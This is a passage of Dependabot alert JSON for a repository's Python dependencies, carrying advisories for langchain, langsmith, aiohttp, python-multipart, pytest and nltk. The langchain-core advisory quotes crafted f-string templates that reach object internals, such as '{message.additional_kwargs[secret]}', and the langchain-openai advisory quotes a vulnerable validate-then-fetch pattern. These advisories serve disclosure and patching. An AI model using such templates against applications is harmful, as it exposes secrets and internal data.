Traversal"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 3.9.3","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/120","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/120","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":119,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-openai"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-r7w7-9xr2-qq2r","cve_id":"CVE-2026-41488","summary":"langchain-openai: Image token counting SSRF protection can be bypassed via DNS rebinding","description":"## Summary\n\n`langchain-openai`'s `_url_to_size()` helper (used by `get_num_tokens_from_messages` for image token counting) validated URLs for SSRF protection and then fetched them in a separate network operation with independent DNS resolution. This left a TOCTOU / DNS rebinding window: an attacker-controlled hostname could resolve to a public IP during validation and then to a private/localhost IP during the actual fetch.\n\nThe practical impact is limited because the fetched response body is passed directly to Pillow's `Image.open()` to extract dimensions — the response content is never returned, logged, or otherwise exposed to the caller. An attacker cannot exfiltrate data from internal services through this path. A potential risk is blind probing (inferring whether an internal host/port is open based on timing or error behavior).\n\n## Affected versions\n\n- `langchain-openai` < 1.1.14\n\n## Patched versions\n\n- `langchain-openai` >= 1.1.14 (requires `langchain-core` >= 1.2.31)\n\n## Affected code\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py` — `_url_to_size()`\n\nThe vulnerable pattern was a validate-then-fetch with separate DNS resolution:\n\n```python\nvalidate_safe_url(image_source, allow_private=False, allow_http=True)\n# ... separate network operation with independent DNS resolution ...\nresponse = httpx.get(image_source, timeout=timeout)\n```\n\n## Fix\n\nThe fix replaces the validate-then-fetch pattern with an SSRF-safe httpx transport (`SSRFSafeSyncTransport` from `langchain-core`) that:\n\n- Resolves DNS once and validates all returned IPs against a policy (private ranges, cloud metadata, localhost, k8s internal DNS)\n- Pins the connection to the validated IP, eliminating the DNS rebinding window\n- Disables redirect following to prevent redirect-based SSRF bypasses\n\nThis fix was released in langchain-openai 1.1.14.","severity":"low","identifiers":[{"value":"GHSA-r7w7-9xr2-qq2r","type":"GHSA"},{"value":"CVE-2026-41488","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-r7w7-9xr2-qq2r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41488"},{"url":"https://github.com/advisories/GHSA-r7w7-9xr2-qq2r"}],"published_at":"2026-04-16T23:00:12Z","updated_at":"2026-04-27T16:33:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 1.1.14","first_patched_version":{"identifier":"1.1.14"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00024,"percentile":0.06665},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 1.1.14","first_patched_version":{"identifier":"1.1.14"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/119","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/119","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":118,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-rr7j-v2q5-chgv","cve_id":"CVE-2026-41182","summary":"LangSmith SDK: Streaming token events bypass output redaction","description":"## Summary\n\nThe LangSmith SDK's output redaction controls (hideOutputs in JS, hide_outputs in Python) do not apply to streaming token events. When an LLM run produces streaming output, each chunk is recorded as a new_token event containing the raw token value. These events bypass the redaction pipeline entirely — prepareRunCreateOrUpdateInputs (JS) and _hide_run_outputs (Python) only process the inputs and outputs fields on a run, never the events array. As a result, applications relying on output redaction to prevent sensitive LLM output from being stored in LangSmith will still leak the full streamed content via run events.\n\n## Details\n\n**Both JS and Python SDKs are affected.** The same pattern exists in both:\n\n- **JS SDK**: `traceable.ts:997-1003` and `traceable.ts:1044-1050`\n- **Python SDK**: `run_helpers.py:1924` and `run_helpers.py:1996`\n\nIn both SDKs, `new_token` events with raw `kwargs.token` values are added during streaming, and the redaction pipeline (`hideOutputs` in JS, `hide_outputs` in Python) only processes `inputs`/`outputs` — never `events`.","severity":"medium","identifiers":[{"value":"GHSA-rr7j-v2q5-chgv","type":"GHSA"},{"value":"CVE-2026-41182","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-rr7j-v2q5-chgv"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41182"},{"url":"https://github.com/advisories/GHSA-rr7j-v2q5-chgv"}],"published_at":"2026-04-16T01:20:37Z","updated_at":"2026-04-24T20:52:17Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.5.18","first_patched_version":{"identifier":"0.5.19"}},{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00036,"percentile":0.10614},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},{"cwe_id":"CWE-359","name":"Exposure of Private Personal Information to an Unauthorized Actor"},{"cwe_id":"CWE-532","name":"Insertion of Sensitive Information into Log File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/118","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/118","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":117,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mj87-hwqh-73pj","cve_id":"CVE-2026-40347","summary":"python-multipart affected by Denial of Service via large multipart preamble or epilogue data","description":"### Summary\n\nA denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections.\n\n### Details\n\nTwo inefficient multipart parsing paths could be abused with attacker-controlled input.\n\nBefore the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary.\n\n### Impact\n\nAn attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. This issue degrades availability but does not typically result in a complete denial of service for the entire application.\n\n### Mitigation\n\nUpgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.","severity":"medium","identifiers":[{"value":"GHSA-mj87-hwqh-73pj","type":"GHSA"},{"value":"CVE-2026-40347","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-mj87-hwqh-73pj"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.26"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40347"},{"url":"https://github.com/advisories/GHSA-mj87-hwqh-73pj"}],"published_at":"2026-04-15T19:45:44Z","updated_at":"2026-04-24T20:51:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 0.0.26","first_patched_version":{"identifier":"0.0.26"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0002,"percentile":0.05504},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-834","name":"Excessive Iteration"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 0.0.26","first_patched_version":{"identifier":"0.0.26"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/117","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/117","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":116,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"pytest"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6w46-j5rx-g56g","cve_id":"CVE-2025-71176","summary":"pytest has vulnerable tmpdir handling","description":"pytest through 9.0.2 on UNIX relies on directories with the `/tmp/pytest-of-{user}` name pattern, which allows local users to cause a denial of service or possibly gain privileges.","severity":"medium","identifiers":[{"value":"GHSA-6w46-j5rx-g56g","type":"GHSA"},{"value":"CVE-2025-71176","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-71176"},{"url":"https://github.com/pytest-dev/pytest/issues/13669"},{"url":"https://www.openwall.com/lists/oss-security/2026/01/21/5"},{"url":"https://github.com/pytest-dev/pytest/pull/14343"},{"url":"https://github.com/pytest-dev/pytest/commit/95d8423bd24992deea5b9df32555fa1741679e2c"},{"url":"https://github.com/pytest-dev/pytest/releases/tag/9.0.3"},{"url":"https://github.com/advisories/GHSA-6w46-j5rx-g56g"}],"published_at":"2026-01-22T06:30:29Z","updated_at":"2026-04-13T16:38:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 9.0.3","first_patched_version":{"identifier":"9.0.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.0025},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cwes":[{"cwe_id":"CWE-379","name":"Creation of Temporary File in Directory with Insecure Permissions"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 9.0.3","first_patched_version":{"identifier":"9.0.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/116","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/116","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":115,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-926x-3r5x-gfhw","cve_id":"CVE-2026-40087","summary":"LangChain has incomplete f-string validation in prompt templates","description":"LangChain's f-string prompt-template validation was incomplete in two respects.\n\nFirst, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as `PromptTemplate`. In particular, `DictPromptTemplate` and `ImagePromptTemplate` could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting.\n\nExamples of the affected shape include:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n```\n\nSecond, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:\n\n```python\n\"{name:{name.__class__.__name__}}\"\n```\n\nIn this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.\n\n## Affected usage\n\nThis issue is only relevant for applications that accept untrusted template strings, rather than only untrusted template variable values.\n\nIn addition, practical impact depends on what objects are passed into template formatting:\n\n- If applications only format simple values such as strings and numbers, impact is limited and may only result in formatting errors.\n- If applications format richer Python objects, attribute access and indexing may interact with internal object state during formatting.\n\nIn many deployments, these conditions are not commonly present together. Applications that allow end users to author arbitrary templates often expose only a narrow set of simple template variables, while applications that work with richer internal Python objects often keep template structure under developer control. As a result, the highest-impact scenario is plausible but is not representative of all LangChain applications.\n\nApplications that use hardcoded templates or that only allow users to provide variable values are not affected by this issue.\n\n## Impact\n\nThe direct issue in `DictPromptTemplate` and `ImagePromptTemplate` allowed attribute access and indexing expressions to survive template construction and then be evaluated during formatting. When richer Python objects were passed into formatting, this could expose internal fields or nested data to prompt output, model context, or logs.\n\nThe nested format-spec issue is narrower in scope. It bypassed the intended validation rules for f-string templates, but in simple cases it results in an invalid format specifier error rather than direct disclosure. Accordingly, its practical impact is lower than that of direct top-level attribute traversal.\n\nOverall, the practical severity depends on deployment. Meaningful confidentiality impact requires attacker control over the template structure itself, and higher impact further depends on the surrounding application passing richer internal Python objects into formatting.\n\n## Fix\n\nThe fix consists of two changes.\n\nFirst, LangChain now applies f-string safety validation consistently to `DictPromptTemplate` and `ImagePromptTemplate`, so templates containing attribute access or indexing expressions are rejected during construction and deserialization.\n\nSecond, LangChain now rejects nested replacement fields inside f-string format specifiers.\n\nConcretely, LangChain validates parsed f-string fields and raises an error for:\n\n- variable names containing attribute access or indexing syntax such as `.` or `[]`\n- format specifiers containing `{` or `}`\n\nThis blocks templates such as:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n\"{name:{name.__class__.__name__}}\"\n```\n\nThe fix preserves ordinary f-string formatting features such as standard format specifiers and conversions, including examples like:\n\n```python\n\"{value:.2f}\"\n\"{value:>10}\"\n\"{value!r}\"\n```\n\nIn addition, the explicit template-validation path now applies the same structural f-string checks before performing placeholder validation, ensuring that the security checks and validation checks remain aligned.","severity":"medium","identifiers":[{"value":"GHSA-926x-3r5x-gfhw","type":"GHSA"},{"value":"CVE-2026-40087","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-926x-3r5x-gfhw"},{"url":"https://github.com/langchain-ai/langchain/pull/36612"},{"url":"https://github.com/langchain-ai/langchain/pull/36613"},{"url":"https://github.com/langchain-ai/langchain/commit/6bab0ba3c12328008ddca3e0d54ff5a6151cd27b"},{"url":"https://github.com/langchain-ai/langchain/commit/af2ed47c6f008cdd551f3c0d87db3774c8dfe258"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.84"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.28"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40087"},{"url":"https://github.com/advisories/GHSA-926x-3r5x-gfhw"}],"published_at":"2026-04-08T21:51:32Z","updated_at":"2026-04-10T14:41:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":"< 0.3.83","first_patched_version":{"identifier":"0.3.84"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 1.2.28","first_patched_version":{"identifier":"1.2.28"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00055,"percentile":0.17055},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-1336","name":"Improper Neutralization of Special Elements Used in a Template Engine"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 1.2.28","first_patched_version":{"identifier":"1.2.28"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/115","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/115","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":114,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c427-h43c-vf67","cve_id":"CVE-2026-34525","summary":"AIOHTTP accepts duplicate Host headers","description":"### Summary\n\nMultiple Host headers were allowed in aiohttp.\n\n### Impact\n\nMostly this doesn't affect aiohttp security itself, but if a reverse proxy is applying security rules depending on the target Host, it is theoretically possible that the proxy and aiohttp could process different host names, possibly resulting in bypassing a security check on the proxy and getting a request processed by aiohttp in a privileged sub app when using `Application.add_domain()`.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349\nPatch: https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000","severity":"medium","identifiers":[{"value":"GHSA-c427-h43c-vf67","type":"GHSA"},{"value":"CVE-2026-34525","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34525"},{"url":"https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000"},{"url":"https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-c427-h43c-vf67"}],"published_at":"2026-04-01T21:49:45Z","updated_at":"2026-04-01T21:49:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N","score":6.3}},"epss":{"percentage":0.0013,"percentile":0.3204},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/114","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/114","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":113,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-63hf-3vf5-4wqf","cve_id":"CVE-2026-34520","summary":"AIOHTTP's C parser (llhttp) accepts null bytes and control characters in response header values - header injection/security bypass","description":"### Summary\n\nThe C parser (the default for most installs) accepted null bytes and control characters is response headers.\n\n### Impact\n\nAn attacker could send header values that are interpreted differently than expected due to the presence of control characters. For example, `request.url.origin()` may return a different value than the raw Host header, or what a reverse proxy interpreted it as., potentially resulting in some kind of security bypass.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4","severity":"low","identifiers":[{"value":"GHSA-63hf-3vf5-4wqf","type":"GHSA"},{"value":"CVE-2026-34520","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hf-3vf5-4wqf"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34520"},{"url":"https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-63hf-3vf5-4wqf"}],"published_at":"2026-04-01T21:49:06Z","updated_at":"2026-04-06T23:12:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00063,"percentile":0.19232},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/113","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/113","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":112,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mwh4-6h8g-pg8w","cve_id":"CVE-2026-34519","summary":"AIOHTTP has HTTP response splitting via \\r in reason phrase","description":"### Summary\n\nAn attacker who controls the `reason` parameter when creating a `Response` may be able to inject extra headers or similar exploits.\n\n### Impact\n\nIn the unlikely situation that an application allows untrusted data to be used in the response's `reason` parameter, then an attacker could manipulate the response to send something different from what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b","severity":"low","identifiers":[{"value":"GHSA-mwh4-6h8g-pg8w","type":"GHSA"},{"value":"CVE-2026-34519","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34519"},{"url":"https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-mwh4-6h8g-pg8w"}],"published_at":"2026-04-01T21:48:24Z","updated_at":"2026-04-01T21:48:25Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/112","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/112","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":111,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-966j-vmvw-g2g9","cve_id":"CVE-2026-34518","summary":"AIOHTTP leaks Cookie and Proxy-Authorization headers on cross-origin redirect","description":"### Summary\n\nWhen following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers.\n\n### Impact\n\nThe Cookie and Proxy-Authorizations headers could contain sensitive information which may be leaked to an unintended party after following a redirect.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6","severity":"low","identifiers":[{"value":"GHSA-966j-vmvw-g2g9","type":"GHSA"},{"value":"CVE-2026-34518","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-966j-vmvw-g2g9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34518"},{"url":"https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-966j-vmvw-g2g9"}],"published_at":"2026-04-01T21:47:46Z","updated_at":"2026-04-24T20:33:20Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00041,"percentile":0.12317},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/111","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/111","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":110,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3wq7-rqq7-wx6j","cve_id":"CVE-2026-34517","summary":"AIOHTTP has late size enforcement for non-file multipart fields causes memory DoS","description":"### Summary\n\nFor some multipart form fields, aiohttp read the entire field into memory before checking client_max_size.\n\n### Impact\n\nIf an application uses `Request.post()` an attacker can send a specially crafted multipart request to force significant temporary memory allocation even when the request is ultimately rejected.\n\n-----\n\nPatch: 